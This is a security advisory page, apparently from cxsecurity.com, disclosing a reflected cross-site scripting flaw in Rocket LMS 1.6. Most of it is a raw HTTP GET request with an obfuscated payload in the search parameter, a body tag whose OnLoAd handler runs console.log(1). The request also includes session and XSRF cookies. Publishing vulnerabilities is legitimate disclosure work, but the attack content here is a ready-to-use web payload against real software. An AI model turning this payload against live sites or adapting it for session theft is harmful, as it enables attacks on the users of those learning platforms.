Rocket LMS 1.6 Cross Site Scripting

2022.09.13
Credit: th3d1gger
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Rocket LMS - Learning Management System Reflected Cross Site Scripting # Exploit Author: th3d1gger # Vendor Homepage: https://codecanyon.net # Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735 # Version: Version 1.6 # Tested on Ubuntu 18.04 -------Request----------- GET /search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21-- HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 sec-ch-ua-platform: "Linux" Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: empty Referer: http://localhost/search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21-- Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: allow=1; XSRF-TOKEN=eyJpdiI6ImN0MTZwSkxBTEF0VGVtTmo4cmdxSUE9PSIsInZhbHVlIjoidlEvSDRITWdRaXpXU0Q1amE1cSsxTUNZc0lSVHdRWVVxaUp1cURrM3JQSGNTTTQxRUVjSWdGbUtPZVBWV3FiRk5yU3VHNzBZTU4rNDA1VDlsS1BHdC9FRExpbjdhakhDUk56d1l1VGxlSjdFSWVuR2ZQZXBDamt1MVVkdHBRTUsiLCJtYWMiOiJhOTY5YzU2MzE3NmRjMWM0NzBkNmVlNWI1NmU5MjExZGRhZGU2NzYwY2Y5M2FmNzI5YjViMTRmNjI5Y2E0NjdiIn0%3D; rocketlms_session=eyJpdiI6Im9YRVkvTVYyQkZqNkVKR05xK3VVVGc9PSIsInZhbHVlIjoiS1plaFpXSVVJVGdiSE9vK3MxbTk2S3FSMmx6T1dnSGduZ3RZZERlc28xbmRrSWpuSStpMml0L2hkdFdXS3NmWnhHdlV1MXNicUI5Q2ErR1cwODdkYXFEbnd6WlVTZVlCbEZOZVg0VjJrc2J0ZFNVMzd6TW8rVHE5QXlkdEpmS1UiLCJtYWMiOiJhMDBiNjhmNTA1ZDM3ODMzNGQ2MDA4YTA5Nzk0ZDlhMTM5NjM1OWEwNGZmOTViNmU2MGE2YmQ2NWQwMGUzYWMwIn0%3D Connection: close


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top